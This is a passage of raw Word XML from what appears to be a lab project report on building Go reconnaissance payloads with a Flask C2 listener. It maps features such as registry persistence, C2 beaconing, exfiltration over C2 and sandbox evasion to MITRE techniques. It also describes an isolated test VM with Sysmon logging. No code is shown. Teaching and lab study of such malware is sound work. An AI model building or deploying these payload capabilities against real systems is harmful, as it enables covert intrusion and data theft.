              <w:t>System Network Connections Discovery</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F0AB1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="45BB9A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5C224" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1069.001</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58CCA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local Groups Discovery</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C6CD37" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2A89EC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DE8C3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1057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74F38" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Discovery</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6CAAC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="34B982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80D7B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1033</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9DD71" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Owner/User Discovery</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131A0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2ED10F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A8985" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1074.001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A97DF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local Data Staging</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116B5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v1–v3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3B3AA7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20A61" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1547.001</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4F21F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Registry Run Keys — Startup</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962A8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recon v3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="38B2E0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EB1B1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1071.001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3A7AC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web Protocols (C2 Beaconing)</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43930" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="2B05657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CDE80" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1041</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00BB27" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</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89B29" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4C9A19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32DFA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1027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780D3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</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5F08C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="6B5BD5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3D565" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1027.002</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E5091" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Software Packing / String Encoding</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5B273" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="477139B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D1C2E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1497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ED7F8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Virtualization/Sandbox Evasion (Jitter)</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014F8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase 04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DBF4611" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0DEFE34E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="46EFD4BE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc226583747"/>
      <w:r>
        <w:t>3. System Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="79C159B5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099B690C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2A19A13D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc226583748"/>
      <w:r>
        <w:t>3.1  High-Level Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="344B7D9F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The project comprises three separate components running in the lab environment. They are intentionally separated to mirror real-world infrastructure, where payload hosting, C2 communication, and operator interfaces are on distinct servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F1C25"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C0DF0" w14:paraId="786E2BAF"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879A0B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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2D99B3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="358CF8A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ED99A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target VM (Windows)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EBAB1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Runs the compiled .exe payload — isolated VM, Sysmon logging, no internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="61B557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C357F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 Server (Flask :5000)</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D3BA1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Receives HTTP POST beacons from the payload, saves to uploads/ folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3C153B3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BAB32" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Documentation Website (:8000)</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34D31" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lesson write-ups, downloads, MITRE mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="158CEAAC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5A13857A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="39F46D9E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc226583749"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2  Project Directory Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="711E0722" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The project follows Flask's standard directory conventions on Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804A128"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0DF0" w14:paraId="326070BD" w14:textId="77777777">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54A75478" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Project Directory Layout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="0D557747"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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38D1C0C7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>C:\Users\sally\OneDrive\Desktop\payloads\understood\C2_zooSetup_early\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DD5C05" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="042021D5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>├── templates/           # HTML templates (all .html files)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FBE9F13" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>├── static/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE98CAC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>│   ├── payloads/        # Go source files (.go) and C2 server (.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C6641F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>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downloadables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/   # Word document lesson walkthroughs (.docx)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65FBD798" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>│   └── style.css        # Shared CSS across all pages</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098AD65C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>├── c2_upload.py         # Dedicated C2 listener — port 5000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4E4FBB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="1F1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>└── webpage.py           # Main Flask documentation app — port 8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22CD9711" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="44292A76" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7A4ECF0C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc226583750"/>
      <w:r>
        <w:t>4. Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3C6A0BED" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5853A5" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="168DC4E6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc226583751"/>
      <w:r>
        <w:t>4.1  Development Environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="57C76ADE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All payload development was performed on Windows 10/11 using Visual Studio Code with the Go and Python extensions. The Go toolchain was installed from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>go.dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/dl. Cross-compilation to Windows .exe is built into Go's toolchain using GOOS and GOARCH environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BB326"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C0DF0" w14:paraId="3D9A0888"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F46CE2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool</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01D6CC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="334B2AE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61AA1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Visual Studio Code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8686E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Primary IDE for Go and Python development</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4F9B9FD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A1CA9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Go 1.22+</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A6E71" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload compilation — all three payload versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="41DC621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0F80B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python 3 + Flask</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8327" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 server (port 5000) and documentation site (port 8000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="4E072C9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C9813" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows 10/11 VM</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2EAD0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated target environment for detonation and analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1A1FA71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58C06" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysmon + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SwiftOnSecurity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> config</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97162" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Endpoint event logging on the target VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1BEA6AB7"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96216" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Wireshark</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4CC32" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network capture of beacon traffic on the operator machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="1C3E6E7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CAC13" w14:textId="222C1ECE" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysinternals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Suite</w:t>
            </w:r>
            <w:r w:rsidR="003916D2">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21439" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Autoruns (persistence detection), strings.exe (binary analysis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="222118C3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6ABFBBEA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5899005C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc226583752"/>
      <w:r>
        <w:t>4.2  Payload Versions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="00AFA909" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc226583753"/>
      <w:r>
        <w:t>Version 1 — Basic Recon (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>net_scan.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6DF4690D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The first functional payload. Collects network interfaces using Go's native net package, runs </w:t>
      </w:r>
